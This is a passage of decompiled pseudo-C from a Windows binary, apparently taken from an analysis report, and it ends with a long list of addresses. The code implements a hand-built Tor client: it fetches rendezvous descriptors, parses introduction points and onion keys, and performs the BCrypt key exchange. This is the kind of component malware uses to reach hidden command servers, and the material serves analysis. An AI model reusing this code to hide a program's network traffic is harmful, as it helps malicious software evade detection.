                        																	 *((char*)(_t1047 + 4)) = 8;
                        																	_t726 = E004061D2(_t1025 - 0x1fd, _t1047 + 5, 4);
                        																	 *((short*)(_t1047 + 9)) = 0x404;
                        																	_push(_v1780);
                        																	L00406A0C();
                        																	 *((intOrPtr*)(_t1047 + 0xb)) = _t726;
                        																	 *((intOrPtr*)(_t1047 + 0xf)) = 0x40401;
                        																	_t657 = E00404224(__eflags, _v1896, _t1047, 0x202, 0, _a12);
                        																	goto L130;
                        																}
                        																goto L131;
                        															}
                        															_t732 = E004031BE(__eflags, _v12, _v8, _v16, _v20, _a12, _v1896, _v1776, _v1816, _v1772, _v1792, _v1760, _v1752, 1,  &_v516,  &_v512,  &_v508,  &_v504,  &_v572);
                        															__eflags = _t732;
                        															if(_t732 <= 0) {
                        																goto L131;
                        															}
                        															_t733 = E00406259(_v1924, 0x186a0);
                        															_t1027 = _v1924;
                        															 *_t1027 = 0x80;
                        															 *((char*)(_t1027 + 3)) = 1;
                        															 *((char*)(_t1027 + 4)) = 3;
                        															 *((char*)(_t1027 + 5)) = 0x21;
                        															 *((char*)(_t1027 + 0xf)) = 0x14;
                        															_t1004 = 0;
                        															while(1) {
                        																__eflags = _t1004 - 0x14;
                        																if(_t1004 >= 0x14) {
                        																	break;
                        																}
                        																 *[ss:ecx+ebp-0x650] = _t733;
                        																_t1004 = _t1004 + 1;
                        																__eflags = _t1004;
                        															}
                        															E004061D2( &_v1620, _t1027 + 0x10, 0x14);
                        															E00403616(_v12, _v516, _v508, 0, _t1027 + 5, 0, _v564);
                        															E00404224(__eflags, _v1896, _v1924, 0x202, 0, _a12);
                        															_t740 = E00404554(_v1896, _v1920, 0x202, _a12, 0x14);
                        															_t1028 = _v1920;
                        															__eflags = _t740;
                        															if(_t740 != 0) {
                        																goto L131;
                        															}
                        															__eflags =  *((char*)(_t1028 + 4)) - 3;
                        															if(__eflags != 0) {
                        																goto L131;
                        															}
                        															_t657 = E00403697(__eflags, _v12, _v512, _v504, 0, _t1028 + 5, 1, _v560);
                        															__eflags = _t657;
                        															if(_t657 == 0) {
                        																goto L131;
                        															}
                        															__eflags =  *((intOrPtr*)(_t1028 + 5)) - 0x27;
                        															if( *((intOrPtr*)(_t1028 + 5)) != 0x27) {
                        																goto L131;
                        															}
                        															goto L130;
                        														}
                        														_v56 = 0;
                        														_v24 = 2;
                        														_v28 = 1;
                        														while(1) {
                        															__eflags = _v56 - 2;
                        															if(_v56 >= 2) {
                        																break;
                        															}
                        															_v1566 = _v56;
                        															E004030CA(_v12,  &_v1570, 5,  &_v1590, 0, 0xffffffff);
                        															E004030CA(_v12,  &_v1600, 0x1e,  &_v1565, 0, 0xffffffff);
                        															E00406368( &_v1565, 0x14,  &_v1545);
                        															E004061D2( &_v1704,  &_v40, 4);
                        															E004061D2( &_v1704,  &_v48, 4);
                        															_t986 = 0;
                        															while(1) {
                        																__eflags = _v48;
                        																if(_v48 <= 0) {
                        																	break;
                        																}
                        																E004061D2( &_v48,  &_v40, 4);
                        																_v40 = _v40 >> 1;
                        																_t767 = E00403C2A(__eflags, E00403CE1(_v576, _t986 + _v40, 8),  &_v1748,  &_v1768,  &_v1788,  &_v1808);
                        																_v36 = 0;
                        																__eflags = _t767;
                        																if(_t767 != 0) {
                        																	L76:
                        																	__eflags = _v36 - 1;
                        																	if(_v36 != 1) {
                        																		E004061D2( &_v40,  &_v48, 4);
                        																	} else {
                        																		_t986 = _t986 + _v40 + 1;
                        																		_v48 = _v48 - _v40 + 1;
                        																	}
                        																	continue;
                        																}
                        																CryptStringToBinaryA(_v1748, 0, 1, 0,  &_v32, 0, 0);
                        																CryptStringToBinaryA(_v1748, 0, 1,  &_v1445,  &_v32, 0, 0);
                        																_t1011 = 0;
                        																while(1) {
                        																	__eflags = _t1011 - 0x14;
                        																	if(_t1011 >= 0x14) {
                        																		goto L76;
                        																	}
                        																	_t830 =  *[ss:ecx+ebp-0x5a1];
                        																	__eflags = _t830 -  *[ss:ecx+ebp-0x619];
                        																	if(_t830 >  *[ss:ecx+ebp-0x619]) {
                        																		goto L76;
                        																	}
                        																	__eflags = _t830 -  *[ss:ecx+ebp-0x619];
                        																	if(_t830 !=  *[ss:ecx+ebp-0x619]) {
                        																		_v36 = 1;
                        																	}
                        																	_t1011 = _t1011 + 1;
                        																}
                        																goto L76;
                        															}
                        															_v32 = 0;
                        															while(1) {
                        																__eflags = _v32 - 3;
                        																if(_v32 >= 3) {
                        																	break;
                        																}
                        																_t772 = E00403CE1(_v576, _t986, 8);
                        																_t986 = _t986 + 1;
                        																_t1014 = _t772;
                        																__eflags = E00403C2A(__eflags, _t772,  &_v1748,  &_v1768,  &_v1788,  &_v1808);
                        																if(__eflags != 0) {
                        																	continue;
                        																}
                        																__eflags = E004031BE(__eflags, _v12, _v8, _v16, _v20, _a12, _v1896, _v1776, _v1816, _v1768, _v1788, _v1760, _v1748, _v24,  &_v500,  &_v496,  &_v492,  &_v488,  &_v556);
                        																if(__eflags <= 0) {
                        																	L102:
                        																	E00403515(_v1896, _v1920, _a12, _v24);
                        																	_v24 = _v24 + 1;
                        																	_v28 = _v28 + 1;
                        																	_v32 = _v32 + 1;
                        																	_t657 = E00406561(__eflags, _v1924, 0x186a0, "-----END MESSAGE-----");
                        																	__eflags = _t657;
                        																	if(_t657 != 0) {
                        																		_v52 = _t657;
                        																		goto L130;
                        																	}
                        																	continue;
                        																}
                        																E00406259(_v1924, 0x186a0);
                        																_t1029 = _v1924;
                        																 *_t1029 = 0x80;
                        																 *((char*)(_t1029 + 3)) = _v24;
                        																 *((char*)(_t1029 + 4)) = 3;
                        																 *((char*)(_t1029 + 5)) = 0xd;
                        																 *((char*)(_t1029 + 9)) = _v28;
                        																E00403616(_v12, _v500, _v492, 0, _t1029 + 5, 0, _v548);
                        																E00404224(__eflags, _v1896, _v1924, 0x202, 0, _a12);
                        																_t792 = E00404554(_v1896, _v1920, 0x202, _a12, 0x14);
                        																_t1030 = _v1920;
                        																__eflags = _t792;
                        																if(_t792 != 0) {
                        																	goto L131;
                        																}
                        																__eflags =  *((char*)(_t1030 + 4)) - 3;
                        																if(__eflags != 0) {
                        																	goto L102;
                        																}
                        																_t794 = E00403697(__eflags, _v12, _v496, _v488, 0, _t1030 + 5, 1, _v544);
                        																__eflags = _t794;
                        																if(_t794 == 0) {
                        																	goto L131;
                        																}
                        																__eflags =  *((intOrPtr*)(_t1030 + 5)) - 4;
                        																if(__eflags != 0) {
                        																	goto L102;
                        																}
                        																E00406259(_v1924, 0x186a0);
                        																_t1031 = _v1924;
                        																 *_t1031 = 0x80;
                        																 *((char*)(_t1031 + 3)) = _v24;
                        																 *((char*)(_t1031 + 4)) = 3;
                        																 *((char*)(_t1031 + 5)) = 2;
                        																 *((char*)(_t1031 + 9)) = _v28;
                        																_t800 = wsprintfA(_t1031 + 0x10, "GET /tor/rendezvous2/%s HTTP/1.0\r\nHost: %s\r\nConnection: close\r\n\r\n",  &_v1545, _v1768);
                        																_t1049 = _t1049 + 0x10;
                        																_t801 = _t800 + 1;
                        																__eflags = _t801;
                        																 *(_t1031 + 0xf) = _t801;
                        																E00403616(_v12, _v500, _v492, 0, _t1031 + 5, 1, _v548);
                        																E00404224(__eflags, _v1896, _v1924, 0x202, 0, _a12);
                        																_v40 = 0;
                        																_v48 = 2;
                        																_v52 = 0;
                        																_t1044 = _v1920;
                        																_t1032 = _v1924;
                        																E00406259(_v1924, 0x186a0);
                        																while(1) {
                        																	E0040621F(_v1896, 0,  &_v1916, 0xa, 0);
                        																	_push( &_v1904);
                        																	_push(0);
                        																	_push(0);
                        																	_t809 =  &_v1916;
                        																	_push(_t809);
                        																	_push(0);
                        																	L00406A24();
                        																	__eflags = _t809;
                        																	if(_t809 < 0) {
                        																		goto L131;
                        																	}
                        																	__eflags = _t809;
                        																	if(__eflags == 0) {
                        																		goto L102;
                        																	}
                        																	_t812 = E00404359(__eflags, _v1896,  &_v1892, _a12);
                        																	__eflags = _t812;
                        																	if(_t812 <= 0) {
                        																		goto L131;
                        																	}
                        																	_t1017 =  &(_v1920[_v40]);
                        																	_v40 = _v40 + _t812;
                        																	__eflags = _v40 - 0x186a0;
                        																	if(_v40 > 0x186a0) {
                        																		goto L133;
                        																	}
                        																	E004061D2(_v1892, _t1017, _t812);
                        																	E00404681( &_v1892);
                        																	_t816 = _v40;
                        																	_t817 = _t816 / 0x202;
                        																	_t1014 = _t816 % 0x202;
                        																	__eflags = _t816 % 0x202;
                        																	if(_t816 % 0x202 != 0) {
                        																		continue;
                        																	}
                        																	_v44 = _t817;
                        																	while(1) {
                        																		__eflags = _v44;
                        																		if(_v44 <= 0) {
                        																			break;
                        																		}
                        																		__eflags =  *_t1044 - 0x80;
                        																		if(__eflags != 0) {
                        																			L99:
                        																			_t1044 = _t1044 + 0x202;
                        																			_t478 =  &_v44;
                        																			 *_t478 = _v44 - 1;
                        																			__eflags =  *_t478;
                        																			continue;
                        																		}
                        																		_t822 = E00403697(__eflags, _v12, _v496, _v488, 0, _t1044 + 5, _v48, _v544);
                        																		__eflags = _t822;
                        																		if(_t822 == 0) {
                        																			goto L131;
                        																		}
                        																		__eflags =  *((short*)(_t1044 + 4)) - 0x503;
                        																		if( *((short*)(_t1044 + 4)) == 0x503) {
                        																			goto L99;
                        																		}
                        																		__eflags =  *((short*)(_t1044 + 4)) - 0x203;
                        																		if(__eflags != 0) {
                        																			goto L102;
                        																		}
                        																		_t1008 =  *((intOrPtr*)(_t1044 + 0xe));
                        																		E004061D2(_t1044 + 0x10, _t1032, _t1008);
                        																		_t1032 = _t1032 + _t1008;
                        																		_t476 =  &_v48;
                        																		 *_t476 = _v48 + 1;
                        																		__eflags =  *_t476;
                        																		goto L99;
                        																	}
                        																}
                        																goto L131;
                        															}
                        															_t493 =  &_v56;
                        															 *_t493 = _v56 + 1;
                        															__eflags =  *_t493;
                        														}
                        														goto L133;
                        													}
                        													_t832 = E00406561(__eflags, _v1924, 0x186a0, "-----BEGIN MESSAGE-----") + 0x17;
                        													_v52 = _v52 - _t832;
                        													_t1033 = _v1920;
                        													while(1) {
                        														__eflags = _v52;
                        														if(_v52 <= 0) {
                        															break;
                        														}
                        														asm("lodsb");
                        														__eflags = _t832 - 0x20;
                        														if(_t832 > 0x20) {
                        															asm("stosb");
                        														}
                        														_t81 =  &_v52;
                        														 *_t81 = _v52 - 1;
                        														__eflags =  *_t81;
                        													}
                        													 *_t1033 = 0;
                        													CryptStringToBinaryA(_v1920, 0, 1, 0,  &_v32, 0, 0);
                        													_t836 = E00404656(_v32,  &_v1928);
                        													__eflags = _t836;
                        													if(_t836 == 0) {
                        														goto L133;
                        													}
                        													CryptStringToBinaryA(_v1920, 0, 1, _v1928,  &_v32, 0, 0);
                        													_t1034 = _v1928;
                        													_t987 = 0;
                        													while(1) {
                        														__eflags = _t987 - 3;
                        														if(_t987 >= 3) {
                        															break;
                        														}
                        														__eflags = _v32;
                        														if(__eflags > 0) {
                        															_t975 = E00406527(__eflags, _t1034, _v32, "introduction-point");
                        															__eflags = _t975;
                        															if(__eflags == 0) {
                        																break;
                        															}
                        															 *(_t1048 + _t987 * 4 - 0x72c) = _t975;
                        															_t976 = E00406527(__eflags, _t1034, _v32, "ip-address");
                        															__eflags = _t976;
                        															if(__eflags == 0) {
                        																goto L133;
                        															}
                        															 *(_t1048 + _t987 * 4 - 0x738) = _t976;
                        															_t977 = E00406527(__eflags, _t1034, _v32, "onion-port");
                        															__eflags = _t977;
                        															if(__eflags == 0) {
                        																goto L133;
                        															}
                        															 *(_t1048 + _t987 * 4 - 0x744) = _t977;
                        															_t978 = E00406561(__eflags, _t1034, _v32, "service-key");
                        															__eflags = _t978;
                        															if(__eflags == 0) {
                        																goto L133;
                        															}
                        															_t980 = _t978 + 1 - _t1034;
                        															_t1034 =  &(_t1034[_t980]);
                        															_v32 = _v32 - _t980;
                        															_t981 = E00406561(__eflags, _t1034, _v32, "KEY-----");
                        															__eflags = _t981;
                        															if(__eflags == 0) {
                        																goto L133;
                        															}
                        															 *((intOrPtr*)(_t1048 + _t987 * 4 - 0x750)) = _t981 + 8;
                        															_t983 = E00406561(__eflags, _t1034, _v32, "-----END");
                        															__eflags = _t983;
                        															if(_t983 == 0) {
                        																goto L133;
                        															}
                        															 *_t983 = 0;
                        															_t987 = _t987 + 1;
                        															__eflags = _t987;
                        															continue;
                        														}
                        														break;
                        													}
                        													while(1) {
                        														__eflags = _t987;
                        														if(__eflags <= 0) {
                        															break;
                        														}
                        														_t987 = _t987 - 1;
                        														_t844 = E004031BE(__eflags, _v12, _v8, _v16, _v20, _a12, _v1896, _v1776, _v1816,  *(_t1048 + _t987 * 4 - 0x738),  *(_t1048 + _t987 * 4 - 0x744), _v1760,  *(_t1048 + _t987 * 4 - 0x72c), _v24,  &_v484,  &_v480,  &_v476,  &_v472,  &_v540);
                        														__eflags = _t844;
                        														if(_t844 <= 0) {
                        															L57:
                        															E00403515(_v1896, _v1920, _a12, _v24);
                        															_t271 =  &_v24;
                        															 *_t271 = _v24 + 1;
                        															__eflags =  *_t271;
                        															continue;
                        														}
                        														_t880 = E004065B9(E00406259( &_v1600, 0x400), 0x100);
                        														asm("stosb");
                        														asm("loop 0xfffffff5");
                        														_v1070 = 2;
                        														_push(_v1764);
                        														L00406A0C();
                        														_v1069 = _t880;
                        														_t881 = E004061EA(_v1784);
                        														_v1065 = _t881;
                        														_v1064 = _t881;
                        														CryptStringToBinaryA(_v1752, 0, 1, 0,  &_v40, 0, 0);
                        														CryptStringToBinaryA(_v1752, 0, 1,  &_v1063,  &_v40, 0, 0);
                        														_t889 = E00403DE9(_t1014, __eflags, _v1776, _v1816,  &_v1063,  &_v1041);
                        														__eflags = _t889;
                        														if(_t889 == 0) {
                        															goto L131;
                        														}
                        														_v1043 = _t889;
                        														_v1042 = _t889;
                        														E004061D2( &_v1620,  &_v901, 0x14);
                        														_v456 = 7;
                        														_v455 = 2;
                        														_v454 = 0;
                        														_v452 = 0xaa02;
                        														_v448 = 0x32484400;
                        														_v444 = 0x400;
                        														E004065B9(E004061D2(0x40841c,  &_v440, 0x80), 0x100);
                        														asm("stosb");
                        														asm("loop 0xfffffff5");
                        														E00406259( &_v312, 0x80);
                        														_v312 = 2;
                        														E00403BB4(_v8,  &_v456,  &_v881);
                        														_t1040 =  &_v1460;
                        														_t901 = 1;
                        														while(1) {
                        															_t901 = _t901;
                        															__eflags = _t901;
                        															if(_t901 == 0) {
                        																break;
                        															}
                        															asm("lodsb");
                        															__eflags = _t901 - 0x20;
                        															if(_t901 > 0x20) {
                        																asm("stosb");
                        															}
                        														}
                        														 *_t1040 = 0;
                        														CryptStringToBinaryA( &_v1460, 0, 1, 0,  &_v36, 0, 0);
                        														CryptStringToBinaryA( &_v1460, 0, 1,  &_v1600,  &_v36, 0, 0);
                        														_v40 = 0x94;
                        														E00406259( &_v1460, 0x94);
                        														_push( &_v40);
                        														_push( &_v1460);
                        														_push(0);
                        														_push(0x8c);
                        														_push( &_v1600);
                        														_push(0x13);
                        														_push(1);
                        														L00406AB4();
                        														_v1312 = 0x31415352;
                        														_v1308 = 0x400;
                        														_v1304 = 4;
                        														_v1300 = 0x80;
                        														_v1296 = 0;
                        														_v1292 = 0;
                        														asm("bswap eax");
                        														_v1288 = _v1444;
                        														E0040618C( &_v1313,  &_v1284, 0x80);
                        														_push(0);
                        														_push(0x9c);
                        														_push( &_v1312);
                        														_push( &_v460);
                        														_push(L"RSAPUBLICBLOB");
                        														_push(0);
                        														_push(_v16);
                        														 *((intOrPtr*)(E00406788(__eflags, E00406698("bcrypt.dll"), "BCryptImportKeyPair")))();
                        														E00406259(_v1924, 0x186a0);
                        														_t1041 = _v1924;
                        														 *_t1041 = 0x80;
                        														 *((char*)(_t1041 + 3)) = _v24;
                        														 *((char*)(_t1041 + 4)) = 3;
                        														 *((char*)(_t1041 + 5)) = 0x22;
                        														 *((char*)(_t1041 + 0xe)) = 0x18b;
                        														 *((char*)(_t1041 + 0xf)) = 0x18b;
                        														E004030CA(_v12,  &_v1600, 0x8c, _t1041 + 0x10, 0, 0xffffffff);
                        														_v1888 = L"SHA1";
                        														_v1884 = 0;
                        														_v1880 = 0;
                        														_push(4);
                        														_push( &_v48);
                        														_push(0x80);
                        														_push(_t1041 + 0x24);
                        														_push(0);
                        														_push(0);
                        														_push( &_v1888);
                        														_push(0x56);
                        														_push( &_v1086);
                        														_push(_v460);
                        														 *((intOrPtr*)(E00406788(__eflags, E00406698("bcrypt.dll"), "BCryptEncrypt")))();
                        														E0040605D( &_v460,  &_v460, 0, 1);
                        														_v1312 = 0x4d42444b;
                        														_v1308 = 1;
                        														_v1304 = 0x10;
                        														E004061D2( &_v1086,  &_v1300, 0x10);
                        														_push(0);
                        														_push(0x1c);
                        														_push( &_v1312);
                        														_push(0);
                        														_push(0);
                        														_push( &_v460);
                        														_push(L"KeyDataBlob");
                        														_push(0);
                        														_push(_v20);
                        														 *((intOrPtr*)(E00406788(__eflags, E00406698("bcrypt.dll"), "BCryptImportKey")))();
                        														E004061D2( &_v1000, _t1041 + 0xa4, 0xf7);
                        														E00403554(__eflags, _v460, _t1041 + 0xa4, 0xf7, 0);
                        														E0040605D( &_v460,  &_v460, 0, 1);
                        														E00403616(_v12, _v484, _v476, 0, _t1041 + 5, 0, _v532);
                        														E00404224(__eflags, _v1896, _v1924, 0x202, 0, _a12);
                        														_t959 = E00404554(_v1896, _v1920, 0x404, _a12, 0x64);
                        														_t1042 = _v1920;
                        														__eflags = _t959;
                        														if(_t959 != 0) {
                        															goto L131;
                        														}
                        														__eflags =  *((char*)(_t1042 + 4)) - 3;
                        														if(__eflags != 0) {
                        															goto L133;
                        														}
                        														_t961 = E00403697(__eflags, _v12, _v480, _v472, 0, _t1042 + 5, 1, _v528);
                        														__eflags = _t961;
                        														if(_t961 == 0) {
                        															goto L131;
                        														}
                        														__eflags =  *((intOrPtr*)(_t1042 + 5)) - 0x28;
                        														if(__eflags != 0) {
                        															goto L133;
                        														}
                        														_t963 = E00403697(__eflags, _v12, _v512, _v504, 0, _t1042 + 0x207, 2, _v560);
                        														__eflags = _t963;
                        														if(_t963 == 0) {
                        															goto L131;
                        														}
                        														E0040618C(_t1042 + 0x291,  &_v312, 0x80);
                        														_t973 = E0040372E(__eflags, _v8, _v12, _v20,  &_v456, _t1042 + 0x292,  &_v468,  &_v464,  &_v524,  &_v520);
                        														__eflags = _t973;
                        														if(_t973 == 0) {
                        															goto L131;
                        														}
                        														_t987 = 0xffffffff;
                        														goto L57;
                        													}
                        													__eflags = _t987;
                        													if(_t987 >= 0) {
                        														goto L133;
                        													}
                        													E00406259(_v1924, 0x186a0);
                        													_t1035 = _v1924;
                        													 *_t1035 = 0x80;
                        													 *((char*)(_t1035 + 3)) = 1;
                        													 *((char*)(_t1035 + 4)) = 3;
                        													 *((char*)(_t1035 + 5)) = 1;
                        													 *((char*)(_t1035 + 9)) = _v28;
                        													 *((char*)(_t1035 + 0xf)) = 0x12;
                        													E00406270(0x40807e, 0xa,  &_v1740);
                        													E00406368( &_v1740, 0xa, _t1035 + 0x10);
                        													 *((char*)(_t1035 + 0x20)) = 0x3a;
                        													E00406270(0x408074, 0xffffffff,  &_v1828);
                        													 *((intOrPtr*)(_t1035 + 0xf)) =  *((intOrPtr*)(_t1035 + 0xf)) + E00406492(__eflags,  &_v1828);
                        													E004061D2( &_v1828, _t1035 + 0x21, _t856);
                        													E00403616(_v12, _v516, _v508, _v468, _t1035 + 5, 1, _v524);
                        													E00404224(__eflags, _v1896, _v1924, 0x202, 0, _a12);
                        													_t863 = E00404554(_v1896, _v1920, 0x202, _a12, 0x64);
                        													_t1036 = _v1920;
                        													__eflags = _t863;
                        													if(_t863 != 0) {
                        														goto L131;
                        													}
                        													__eflags = _t1036[4] - 3;
                        													if(__eflags != 0) {
                        														goto L131;
                        													}
                        													_t865 = E00403697(__eflags, _v12, _v512, _v504, _v464,  &(_t1036[5]), 3, _v520);
                        													__eflags = _t865;
                        													if(_t865 == 0) {
                        														goto L131;
                        													}
                        													__eflags = _t1036[5] - 4;
                        													if(_t1036[5] == 4) {
                        														E004061D2( &_v12, _a24, 4);
                        														E004061D2( &_v516, _a28, 0x10);
                        														E004061D2( &_v468, _a28 + 0x10, 8);
                        														E004061D2( &_v524, _a32, 8);
                        														E004061D2( &_v28, _a36, 4);
                        														_v1932 = 1;
                        													}
                        													goto L133;
                        												}
                        												__eflags = _v1816;
                        												if(_v1816 == 0) {
                        													continue;
                        												}
                        												goto L26;
                        											}
                        											__eflags = _t657 - 0x1f;
                        											if(__eflags != 0) {
                        												continue;
                        											}
                        											goto L23;
                        										}
                        										__eflags = _t657 - 0x17;
                        										if(_t657 != 0x17) {
                        											continue;
                        										}
                        										goto L21;
                        									}
                        									__eflags = _t657 - 7;
                        									if(_t657 != 7) {
                        										continue;
                        									}
                        									goto L19;
                        								}
                        								__eflags = _t657 - 7;
                        								if(_t657 != 7) {
                        									continue;
                        								}
                        								goto L17;
                        							}
                        							break;
                        						} else {
                        							continue;
                        						}
                        					}
                        				}
                        				L133:
                        				_v40 = 0xc;
                        				__eflags = _v1932 - 1;
                        				if(_v1932 != 1) {
                        					_v40 = 0xe;
                        				}
                        				E0040609E( &_v572,  &_v572, 0, _v40);
                        				_v40 = 8;
                        				_v48 = 4;
                        				__eflags = _v1932 - 1;
                        				if(_v1932 != 1) {
                        					_v40 = 0xe;
                        					_v48 = 0;
                        				}
                        				E0040605D( &_v516,  &_v516, _v48, _v40);
                        				CryptReleaseContext(_v8, 0);
                        				__eflags = _v1932 - 1;
                        				if(_v1932 != 1) {
                        					_push(0);
                        					_push(_v12);
                        					 *((intOrPtr*)(E00406788(__eflags, E00406698("bcrypt.dll"), "BCryptCloseAlgorithmProvider")))();
                        				}
                        				_push(0);
                        				_push(_v16);
                        				 *((intOrPtr*)(E00406788(__eflags, E00406698("bcrypt.dll"), "BCryptCloseAlgorithmProvider")))();
                        				_push(0);
                        				_push(_v20);
                        				 *((intOrPtr*)(E00406788(__eflags, E00406698("bcrypt.dll"), "BCryptCloseAlgorithmProvider")))();
                        				E004061D2( &_v1896, _a20, 4);
                        				E00404681( &_v576);
                        				E00404681( &_v1928);
                        				E00404681( &_v1920);
                        				E00404681( &_v1924);
                        				return _v1932;
                        			}














































































































































































































                        0x004011b8
                        0x004011cf
                        0x004011e6
                        0x004011eb
                        0x004011ed
                        0x004011f5
                        0x004011f9
                        0x0040120f
                        0x00401211
                        0x00401213
                        0x0040121b
                        0x0040121f
                        0x00401235
                        0x00401237
                        0x00401239
                        0x00401241
                        0x00401245
                        0x0040125b
                        0x0040125d
                        0x0040125f
                        0x00401267
                        0x0040126e
                        0x0040126f
                        0x00401287
                        0x00401289
                        0x00401293
                        0x0040129d
                        0x004012a7
                        0x004012b1
                        0x004012bb
                        0x004012c5
                        0x004012cf
                        0x004012d9
                        0x004012e3
                        0x004012ed
                        0x004012f7
                        0x00401301
                        0x0040130b
                        0x00401315
                        0x0040131f
                        0x00401329
                        0x00401333
                        0x0040133d
                        0x00401347
                        0x00401351
                        0x0040135b
                        0x00401365
                        0x0040136f
                        0x0040136f
                        0x0040136f
                        0x0040136f
                        0x00401375
                        0x00000000
                        0x00000000
                        0x0040137d
                        0x004013a6
                        0x004013a6
                        0x004013a8
                        0x00000000
                        0x00000000
                        0x004013aa
                        0x004013bb
                        0x004013c0
                        0x004013c2
                        0x00000000
                        0x004013c4
                        0x004013cf
                        0x004013da
                        0x004013df
                        0x004013e9
                        0x004013f3
                        0x004013f9
                        0x004013fd
                        0x00401410
                        0x00401417
                        0x0040141c
                        0x0040141f
                        0x00401421
                        0x00401421
                        0x0040141f
                        0x00401427
                        0x00401428
                        0x00401428
                        0x00401428
                        0x00401437
                        0x0040143e
                        0x0040269a
                        0x0040269a
                        0x004026a1
                        0x00000000
                        0x00000000
                        0x00401466
                        0x00401469
                        0x0040146e
                        0x00401475
                        0x00401480
                        0x00401480
                        0x00401487
                        0x00401492
                        0x00401492
                        0x00401499
                        0x004014a4
                        0x004014a4
                        0x004014ab
                        0x004014b6
                        0x004014dd
                        0x004014e2
                        0x004014e2
                        0x004014e4
                        0x00000000
                        0x00000000
                        0x004014ea
                        0x004014f1
                        0x00401500
                        0x00401500
                        0x00401507
                        0x00401dc6
                        0x00401dcd
                        0x00402311
                        0x00402318
                        0x0040248c
                        0x00402493
                        0x00402677
                        0x00402677
                        0x00000000
                        0x00402677
                        0x004024b7
                        0x004024b9
                        0x0040267f
                        0x0040268b
                        0x00402690
                        0x00000000
                        0x00402690
                        0x004024d1
                        0x004024d6
                        0x004024ec
                        0x004024f1
                        0x004024f3
                        0x00000000
                        0x00000000
                        0x00402505
                        0x0040250a
                        0x0040250c
                        0x00000000
                        0x00000000
                        0x00402512
                        0x00402518
                        0x0040251f
                        0x00402526
                        0x00402539
                        0x00402544
                        0x00402545
                        0x00402547
                        0x00402549
                        0x0040254f
                        0x00402550
                        0x00402552
                        0x00402557
                        0x00402559
                        0x00000000
                        0x00000000
                        0x0040256f
                        0x00402574
                        0x00402576
                        0x00000000
                        0x00000000
                        0x0040257c
                        0x0040257f
                        0x00402585
                        0x00402587
                        0x00402587
                        0x00402587
                        0x00402590
                        0x00402595
                        0x0040259c
                        0x00000000
                        0x00000000
                        0x0040259e
                        0x004025a8
                        0x004025ad
                        0x004025b0
                        0x00000000
                        0x00000000
                        0x004025bb
                        0x004025c4
                        0x004025c7
                        0x00000000
                        0x00402672
                        0x004025db
                        0x004025fe
                        0x00402600
                        0x00402609
                        0x0040260b
                        0x0040260d
                        0x0040261e
                        0x00402623
                        0x00402629
                        0x0040263a
                        0x0040263f
                        0x00402645
                        0x0040264b
                        0x00402650
                        0x00402653
                        0x0040266b
                        0x00000000
                        0x0040266b
                        0x00000000
                        0x00402526
                        0x0040237c
                        0x00402381
                        0x00402383
                        0x00000000
                        0x00000000
                        0x00402394
                        0x00402399
                        0x0040239f
                        0x004023a2
                        0x004023a6
                        0x004023aa
                        0x004023ae
                        0x004023b2
                        0x004023cc
                        0x004023cc
                        0x004023cf
                        0x00000000
                        0x00000000
                        0x004023c3
                        0x004023cb
                        0x004023cb
                        0x004023cb
                        0x004023de
                        0x00402400
                        0x0040241b
                        0x00402436
                        0x0040243b
                        0x00402441
                        0x00402443
                        0x00000000
                        0x00000000
                        0x00402449
                        0x0040244d
                        0x00000000
                        0x00000000
                        0x00402470
                        0x00402475
                        0x00402477
                        0x00000000
                        0x00000000
                        0x0040247d
                        0x00402481
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00402487
                        0x00401dd3
                        0x00401dda
                        0x00401de1
                        0x004022fa
                        0x004022fa
                        0x004022fe
                        0x00000000
                        0x00000000
                        0x00401df0
                        0x00401e0d
                        0x00401e29
                        0x00401e3e
                        0x00401e50
                        0x00401e62
                        0x00401e67
                        0x00401f4d
                        0x00401f4d
                        0x00401f51
                        0x00000000
                        0x00000000
                        0x00401e78
                        0x00401e7d
                        0x00401eb3
                        0x00401eb8
                        0x00401ebf
                        0x00401ec1
                        0x00401f2b
                        0x00401f2b
                        0x00401f2f
                        0x00401f48
                        0x00401f31
                        0x00401f34
                        0x00401f39
                        0x00401f39
                        0x00000000
                        0x00401f2f
                        0x00401ed7
                        0x00401ef5
                        0x00401efa
                        0x00401f26
                        0x00401f26
                        0x00401f29
                        0x00000000
                        0x00000000
                        0x00401efe
                        0x00401f06
                        0x00401f0e
                        0x00000000
                        0x00401f24
                        0x00401f10
                        0x00401f18
                        0x00401f1a
                        0x00401f1a
                        0x00401f21
                        0x00401f21
                        0x00000000
                        0x00401f26
                        0x00401f57
                        0x004022ed
                        0x004022ed
                        0x004022f1
                        0x00000000
                        0x00000000
                        0x00401f6c
                        0x00401f71
                        0x00401f72
                        0x00401f96
                        0x00401f98
                        0x00000000
                        0x00000000
                        0x00402002
                        0x00402004
                        0x004022b4
                        0x004022c6
                        0x004022cb
                        0x004022ce
                        0x004022d1
                        0x004022e4
                        0x004022e9
                        0x004022eb
                        0x00402309
                        0x00000000
                        0x00402309
                        0x00000000
                        0x004022eb
                        0x00402015
                        0x0040201a
                        0x00402020
                        0x00402026
                        0x00402029
                        0x0040202d
                        0x00402034
                        0x00402054
                        0x0040206f
                        0x0040208a
                        0x0040208f
                        0x00402095
                        0x00402097
                        0x00000000
                        0x00000000
                        0x0040209d
                        0x004020a1
                        0x00000000
                        0x00000000
                        0x004020c4
                        0x004020c9
                        0x004020cb
                        0x00000000
                        0x00000000
                        0x004020d1
                        0x004020d5
                        0x00000000
                        0x00000000
                        0x004020e6
                        0x004020eb
                        0x004020f1
                        0x004020f7
                        0x004020fa
                        0x004020fe
                        0x00402105
                        0x0040211e
                        0x00402123
                        0x00402126
                        0x00402126
                        0x00402128
                        0x00402148
                        0x00402163
                        0x00402168
                        0x0040216f
                        0x00402176
                        0x0040217d
                        0x00402183
                        0x00402194
                        0x00402199
                        0x004021ac
                        0x004021b7
                        0x004021b8
                        0x004021ba
                        0x004021bc
                        0x004021c2
                        0x004021c3
                        0x004021c5
                        0x004021ca
                        0x004021cc
                        0x00000000
                        0x00000000
                        0x004021d2
                        0x004021d4
                        0x00000000
                        0x00000000
                        0x004021ea
                        0x004021ef
                        0x004021f1
                        0x00000000
                        0x00000000
                        0x004021fd
                        0x00402200
                        0x00402203
                        0x0040220a
                        0x00000000
                        0x00000000
                        0x00402218
                        0x00402224
                        0x00402229
                        0x00402233
                        0x00402235
                        0x00402235
                        0x00402237
                        0x00000000
                        0x00000000
                        0x0040223d
                        0x004022a9
                        0x004022a9
                        0x004022ad
                        0x00000000
                        0x00000000
                        0x0040224a
                        0x0040224c
                        0x004022a0
                        0x004022a0
